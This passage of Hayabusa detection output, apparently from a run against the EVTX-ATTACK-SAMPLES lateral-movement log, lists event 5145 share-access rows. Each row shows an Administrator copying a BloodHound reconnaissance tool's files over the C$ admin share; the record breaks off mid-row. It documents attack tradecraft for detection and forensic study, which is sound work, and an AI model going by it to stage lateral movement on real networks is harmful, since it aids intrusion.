10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.658 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\graceful-fs : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.668 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\graphlib : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.668 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\graphlib\dist : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.668 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\graphlib\lib : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.678 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\graphlib\lib\alg : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.678 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\graphlib\lib\data : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.678 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\graphlib\node_modules : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.678 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\graphlib\node_modules\lodash : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.688 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\hyphenate-style-name : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.688 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\hyphenate-style-name\.nyc_output : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.688 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\image-size : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.688 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\image-size\bin : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.698 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\image-size\lib : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.698 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\image-size\lib\types : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.698 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\image-type : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.698 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\imurmurhash : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.708 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\inflight : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.708 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\inherits : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.708 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\inline-style-prefixer : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.708 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\inline-style-prefixer\dist : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.718 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\inline-style-prefixer\lib : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.718 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\inline-style-prefixer\lib\plugins : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.718 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\inline-style-prefixer\lib\static : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.718 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\inline-style-prefixer\lib\utils : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.728 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\invariant : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.728 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\isarray : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.728 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\is-obj : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.738 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\is-zip-file : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.738 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.738 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\dist : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.738 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\external : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.748 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\external\sizzle : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.748 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.748 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src\ajax : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.748 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src\attributes : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.758 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src\core : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.758 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src\css : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.758 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src\data : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.758 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src\deferred : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.768 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src\effects : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.768 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src\event : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.768 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src\exports : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.768 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src\manipulation : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.768 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src\queue : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.778 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src\traversing : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.778 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src\var : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.778 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\js-tokens : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.778 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jszip : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.778 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\keycode : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.788 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\keycode\examples : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.788 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\keycode\test : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.788 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.788 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\dist : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.798 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\dist\plugins : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.808 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.808 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.exporters.gexf : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.808 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.exporters.graphml : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.818 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.exporters.image : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.818 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.exporters.json : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.818 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.exporters.spreadsheet : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.818 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.exporters.svg : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.818 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 